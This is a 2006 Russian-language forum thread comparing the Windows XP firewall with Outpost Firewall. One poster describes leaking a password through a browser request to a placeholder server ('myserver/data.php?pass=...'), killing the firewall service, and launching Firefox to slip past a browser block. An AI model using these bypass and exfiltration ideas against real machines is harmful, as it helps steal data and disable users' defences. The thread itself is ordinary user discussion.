Login
Firewall
NEW 25.10.06 19:31
in Antwort matros777 25.10.06 08:42
25.10.06 19:48
in Antwort игoрь 25.10.06 19:31, Zuletzt geändert 25.10.06 19:51 (Cinelerra)
NEW 25.10.06 19:55
in Antwort Cinelerra 25.10.06 19:48
на всякий пожарный: когда появится желание опять зафлеймить какую-либо ветку в тематическом форуме - рекомендую подумать трижды, ибо раздача слонов может произойти очень быстро.
твоя моя понимай..?
твоя моя понимай..?
[зел]здесь могла бы быть моя автоподпись[/зел]
NEW 25.10.06 20:17
in Antwort gendy 25.10.06 13:02, Zuletzt geändert 25.10.06 20:26 (Strider)
Брандмауэр Windows в ХР отличная вещь. Но он хорошо справляется со своими задачами, пока трой не проник в систему. А если проник так только аутпостом и тормозил засланца.
Что лучше... Outpost Firewall поначалу задаёт кучу глупых вопросов, которые ламера скажем так, ставят в тупик... он не знает коко пустить кого нет, какие запросы мона, какме нет. А встроенный--ничего не спрашивает, а сразу делает свою работу. Минус-не гибкая настройка.
А что касается "любой трой убить может" -так для этого Внутренняя зашита и пароль на настройки. Ну и антивирь.
+ у Outpost'a есть такие фичи как банерорезка, фильтр емэил, антиспай и т.д.
Что лучше... Outpost Firewall поначалу задаёт кучу глупых вопросов, которые ламера скажем так, ставят в тупик... он не знает коко пустить кого нет, какие запросы мона, какме нет. А встроенный--ничего не спрашивает, а сразу делает свою работу. Минус-не гибкая настройка.
А что касается "любой трой убить может" -так для этого Внутренняя зашита и пароль на настройки. Ну и антивирь.
+ у Outpost'a есть такие фичи как банерорезка, фильтр емэил, антиспай и т.д.
NEW 25.10.06 20:23
in Antwort Cinelerra 25.10.06 18:45
специально ради тебя поставил оутпост (уже сн╦с), пров╦л два теста
1. запуск команды типа
http://myserver/data.php?pass=abs
пароль abs благополучно уш╦л на сервер - оутпост даже не заметил
2.отключение сервиса outpost
фоерволл молча исчез, дорога в инет открыта (запустил неавторизованную прогу)
вывод: все пункты на сайте агнитум полная туфта,
1. запуск команды типа
http://myserver/data.php?pass=abs
пароль abs благополучно уш╦л на сервер - оутпост даже не заметил
2.отключение сервиса outpost
фоерволл молча исчез, дорога в инет открыта (запустил неавторизованную прогу)
вывод: все пункты на сайте агнитум полная туфта,
Фашизм будет разбит
Человека карают только те боги, в которых он верит
NEW 25.10.06 20:27
in Antwort Strider 25.10.06 20:17
>А что касается "любой трой убить может" -так для этого Внутренняя зашита и пароль на настройки. Ну и антивирь.
сервис убивается без всяких паролей, без сервиса он никому не нужен
>Ну и антивирь.
если антивир остановил трояна, то оутпост не нужен, если антивир не смог его остановить - троян убил оутпост. так лучше?
а баннерорезка у меня и в бровзере есть, погибче оутпостовской
сервис убивается без всяких паролей, без сервиса он никому не нужен
>Ну и антивирь.
если антивир остановил трояна, то оутпост не нужен, если антивир не смог его остановить - троян убил оутпост. так лучше?
а баннерорезка у меня и в бровзере есть, погибче оутпостовской
Фашизм будет разбит
NEW 25.10.06 20:31
Это точно, он даже сообщает какие dll-ки хотят переписаться. Как незнающему человеку на это реагировать? Итог - паника и нах он нужен, виндовсовского достаточно! Гы
in Antwort Strider 25.10.06 20:17
В ответ на:
Outpost Firewall поначалу зада╦т куче глупых вопрсов, которые ламера скажем так, ставят в тупик.
Outpost Firewall поначалу зада╦т куче глупых вопрсов, которые ламера скажем так, ставят в тупик.
Это точно, он даже сообщает какие dll-ки хотят переписаться. Как незнающему человеку на это реагировать? Итог - паника и нах он нужен, виндовсовского достаточно! Гы

NEW 25.10.06 20:34
in Antwort Дактиль 25.10.06 10:36
Никакой сторонний файерволл в виде ПО и нафиг не нужен .
-------
Ничего, связанного с защитой и секретностью, от дяди билли лучше не иметь. А иметь - сторонеее, серьезное, желательно с открытым кодом. Бо, вынь это тебе не Дебиан....
Насчет Remote Assistance
-------
Согласен.
и Remote Desktop согласна с Вами .
-------
Увы, штука юзабилетная... правда нужны хорошо приделанные руки, чтобы снаружи ничего не сломали...
не пользоваться IE
-------
Ну с этим, пользуя поделку дяди билли, сложно - бог знает когда и зачем он его пользует для внутренних нужд... Вот сделать его дефолтным браузером и зарезать выход в инет на файрволе - самое то...
-------
Ничего, связанного с защитой и секретностью, от дяди билли лучше не иметь. А иметь - сторонеее, серьезное, желательно с открытым кодом. Бо, вынь это тебе не Дебиан....
Насчет Remote Assistance
-------
Согласен.
и Remote Desktop согласна с Вами .
-------
Увы, штука юзабилетная... правда нужны хорошо приделанные руки, чтобы снаружи ничего не сломали...
не пользоваться IE
-------
Ну с этим, пользуя поделку дяди билли, сложно - бог знает когда и зачем он его пользует для внутренних нужд... Вот сделать его дефолтным браузером и зарезать выход в инет на файрволе - самое то...

NEW 25.10.06 20:41
Я так поняла ты команду сам запустил?
Дай пожалуйста ссылку на сайт, где можно поймать виря, который бы оключил мой Outpost. Или мне нужно его скачать и установить?
in Antwort gendy 25.10.06 20:23
В ответ на:
запуск команды типа
запуск команды типа
Я так поняла ты команду сам запустил?

NEW 25.10.06 20:44
in Antwort Strider 25.10.06 20:31
я тестил aofp40b964_6926, только троян написанный мной дурным не будет и в процессманагер не полезет, он знает что службы имеют высший приоритет, убивается оутпост в службах и очень быстро
Фашизм будет разбит
NEW 25.10.06 20:55
in Antwort gendy 25.10.06 20:44
NEW 25.10.06 20:58
in Antwort swetusik 25.10.06 20:41
>Я так поняла ты команду сам запустил? Дай пожалуйста ссылку на сайт, где можно поймать виря, который бы оключил мой Outpost. Или мне нужно его скачать и установить?
сам запустил, я так понимаю что троянца и антивир остановит, до оутпоста дело не дойд╦т, а вот абсолютно легальная прога вполне может отправлять данные на сервер через бровзер, например если найд╦т "неправильный" ключ.
кстати идея в блокировать дефолтный бровзер фоерволом довольно неплохая, пока не запустишь команду типа
firefox http://server........,
сам запустил, я так понимаю что троянца и антивир остановит, до оутпоста дело не дойд╦т, а вот абсолютно легальная прога вполне может отправлять данные на сервер через бровзер, например если найд╦т "неправильный" ключ.
кстати идея в блокировать дефолтный бровзер фоерволом довольно неплохая, пока не запустишь команду типа
firefox http://server........,
Фашизм будет разбит
NEW 25.10.06 21:03
in Antwort gendy 25.10.06 20:58
NEW 25.10.06 21:06
in Antwort игoрь 25.10.06 19:55
NEW 25.10.06 21:11
in Antwort =MxL= 25.10.06 21:06
В Компьютер & Co нельзя создавать темы типа "Антивирь", "Фаервол", "Браузер", "Вынь"... всё равно в курилку уйдут 

NEW 25.10.06 21:17
in Antwort Cinelerra 25.10.06 19:09
> ты остаешься доволен работой виндовской стенкой-)) Если это так, то почему ты не пользуешь именно ее?
- Нет такой возможности и необходимости. Венда у меня тоже есть, ХР один из первых билдов, в очень урезанном состоянии около 400мб, живет на разделе в 1,2гига, никаких СП1,2, само-собой нет.
- Нет такой возможности и необходимости. Венда у меня тоже есть, ХР один из первых билдов, в очень урезанном состоянии около 400мб, живет на разделе в 1,2гига, никаких СП1,2, само-собой нет.
NEW 25.10.06 21:22
Ты имеешь ввиду уязвимость ShellExecute под Windows 2000 и XP? Так это ещё в версии 2.1 решено было.
http://www.agnitum.ru/products/outpost/history.php
in Antwort gendy 25.10.06 20:58, Zuletzt geändert 25.10.06 21:31 (swetusik)
В ответ на:
а вот абсолютно легальная прога вполне может отправлять данные на сервер через бровзер, например если найдёт "неправильный" ключ.
а вот абсолютно легальная прога вполне может отправлять данные на сервер через бровзер, например если найдёт "неправильный" ключ.
Ты имеешь ввиду уязвимость ShellExecute под Windows 2000 и XP? Так это ещё в версии 2.1 решено было.
http://www.agnitum.ru/products/outpost/history.php